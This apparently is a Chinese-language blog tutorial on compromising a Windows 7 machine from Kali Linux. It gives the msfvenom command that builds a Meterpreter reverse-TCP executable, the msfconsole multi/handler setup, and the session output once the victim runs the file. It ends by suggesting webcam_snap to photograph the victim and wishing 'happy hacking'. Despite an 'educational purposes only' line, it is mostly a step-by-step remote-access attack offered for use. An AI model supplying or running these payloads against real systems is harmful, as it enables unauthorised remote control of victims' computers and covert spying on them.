快速入门指南:如何使用Kali Linux破解Windows

Kali Linux源自Debian Linux,主要用于渗透。 它预先安装了300多个渗透测试程序。 Metasploit项目中的Metasploit框架(开发和执行漏洞利用的工具)对此提供了支持。 让我们从使用Kali Linux入侵Windows开始。 值得注意的是,我们仅出于教育目的而写这篇文章。
[*]

[*]原始机器详细信息:

[*]卡利Linux

[email protected]:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
[email protected]:/#

[*]

[*]用于黑客攻击的目标机器:

Windows 7 Ultimate SP1

[*]

[*]第1步 … 负载创建

[*]有效负载是一种类似于病毒或特洛伊木马的程序,出于黑客目的,该程序在远程计算机上运行。 要创建有效负载,请使用下面编写的命令,这些命令将通过 卡利Linux

	
[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
[email protected]:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

[*]

[*]我们使用ls命令来确认有效载荷程序已在指定位置成功创建。

[*]第2步: 运行mfsconsole命令,该命令将运行msf查询。

[email protected]:# msfconsole
 
 
                                   .,,.                  .
                                .$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .
 
 
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
 
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

[*]

[*]第三步: 为了使用,我们使用了以下部分:

  • 端口4444:您可以选择使用
  • LHOST IP:使用Kali Linux时的IP 192.168.189.128。 您可以使用Kali命令找出您的计算机正在使用的IP。
[email protected]:/# ip r l
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
[email protected]:/#

[*]

[*]现在在msf行“ use exploit / multi / handler”中给出以下命令

msf > use exploit/multi/handler
msf exploit(handler) >

[*]

[*]然后在以下行中发出命令“设置有效负载窗口/ meterpreter / reverse_tcp”:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

[*]

[*]现在,使用lhost和lport命令设置本地IP和端口,如下所示:

msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444

[*]

[*]最后使用命令。

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...

[*]

[*]现在,您需要在Windows计算机上执行命令“ program.exe”,一旦在目标计算机上执行了该命令,便可以设置一个抄表器会话。 只需键入SysInfo即可获取受感染Windows计算机的详细信息。

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
 
meterpreter > sysinfo
Computer        : MANN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

[*]

[*]成功收到零件后,您可以使用命令“帮帮我“这将向您显示可以用来入侵系统的所有选项,例如,您可以执行网络摄像头捕捉命令“ webcam_snap”,就像您可以使用许多可用选项一样。 快乐黑客!!!

Sidebar